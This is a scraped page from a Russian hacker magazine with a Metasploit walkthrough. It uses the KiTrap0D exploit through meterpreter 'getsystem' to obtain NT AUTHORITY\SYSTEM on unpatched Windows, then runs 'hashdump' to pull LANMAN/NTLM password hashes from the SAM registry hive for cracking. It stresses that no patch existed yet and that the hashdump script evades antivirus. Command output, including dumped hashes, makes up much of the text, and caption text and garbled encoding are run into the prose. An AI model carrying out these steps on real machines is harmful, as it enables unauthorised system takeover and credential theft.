You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
ПОЛУЧАЕМ СИСТЕМНЫЙ АККА-УНТ В МЕТАСПЛОИТЕОРИГИНАЛЬНАЯ ВЕРСИЯ KITRAP0D В ДЕЙСТВИИЧТОБЫ НЕ ПАРИТЬСЯ С ГРУППО-ВЫМИ ПОЛИТИКАМИ, MICROSOFTПРЕДЛАГАЕТ АВТОМАТИЧЕСКИЙСКРИПТ FIXIT! ДЛЯ ВРЕМЕННОГОРЕШЕНИЯ ДАННОЙ ПРОБЛЕМЫКРАДЕМ ТОКЕН НУЖНОГО ПРОЦЕССА-h Help Banner.-t The technique to use. (Defaultto '0').0 : All techniques available1 : Service — Named PipeImpersonation (In Memory/Admin)2 : Service — Named PipeImpersonation (Dropper/Admin)3 : Service — Token Duplication(In Memory/Admin)4 : Exploit — KiTrap0D (In Memory/User)Как видно, сплоит KiTrap0D реализует лишьчасть функциональности команды. Если тебе удалосьотхватить шелл с пользователем, у которогоуже есть права администратора, то для поднятиядо уровня NT AUTHORITY\SYSTEM можно использоватьтри другие техники (выбрать нужнуюпозволяет ключ -t). Так или иначе, не указаввообще никаких параметров, мы укажем метасплоиту,что тот может использовать любой изподходов. В том числе и KiTrap0D, что повыситнаши привилегии до уровня «Система», какимибы правами мы сейчас ни обладали.meterpreter > getsystem...got system (via technique 4).Ага, получили сообщение об успешном повышениипривилегий, причем для атаки использовалсяименно KiTrap0D — видимо, у негоприоритет. Действительно ли мы поднялись всистеме? Проверим наш текущий UID (идентификаторпользователя):meterpreter > getuidServer username: NT AUTHORITY\SYSTEMЕсть! Всего одна команда в консоли метасплоитаи права NT AUTHORITY\SYSTEM унас в кармане. Далее, вообще говоря, можновсе. При этом напомню, ни одного патча отMicrosoft на момент выхода журнала еще небыло.ÄÀÌÏÈÌ ÏÀÐÎËÈРаз уж на руках есть доступ к системномуаккаунту, то надо извлечь из этого чтонибудьполезное. В арсенале Metasploit естьзамечательная команда hashdump — болеепродвинутая версия известной утилитыpwdump. Более того, в последней версииметасплоита включен переработанный вариантскрипта, который использует модернизированныйпринцип извлечения LANMAN/NTLM хешей и пока не детектируетсяантивирусами. Но смысл не в этом. Важно,что для выполнения команды hashdumpнеобходимы права NT AUTHORITY\SYSTEM.В противном случае программа выдастошибку «[-] priv_passwd_get_sam_hashes:Operation failed: 87». Происходит это потому,что LANMAN/NTLM-хеши паролей пользователейхранятся в специальных ветвях реестраHKEY_LOCAL_MACHINE\SAM и HKEY_LOCAL_MACHINE\SECURITY, которые недоступныдаже администраторам. Их можнопрочитать только с привилегиями системногоаккаунта. Вообще говоря, использоватьКЛЮЧЕВЫЕ СТРОЧКИ В ИСХОД-НИКЕ СПЛОИТАсплоит и затем команду hashdump для того,чтобы локально извлечь из реестра хеша,совсем не обязательно. Но если такая возможностьесть, почему бы и нет?meterpreter > getuidServer username: NT AUTHORITY\SYSTEMmeterpreter > run hashdump[*] Obtaining the boot key...[*] Calculating the hboot keyusing SYSKEY 3ed7[...][*] Obtaining the user list andkeys...[*] Decrypting user keys...[*] Dumping password hashes...Administrator:500:aad2bbbe2b51404eeaad3b435b514ee:...Guest:501:aad3b435baaaaeaa3b435d3b435b514aae04ee:...HelpAssistant:1000:cefa2909bd5b0f4602168042f2f646:...Хеши получены. Остается скормить их какомунибудьиз брутфорсеров, например, l0phtcrack(www.l0phtcrack.com).XÀÊÅÐ 03 /134/ 10 033
Change language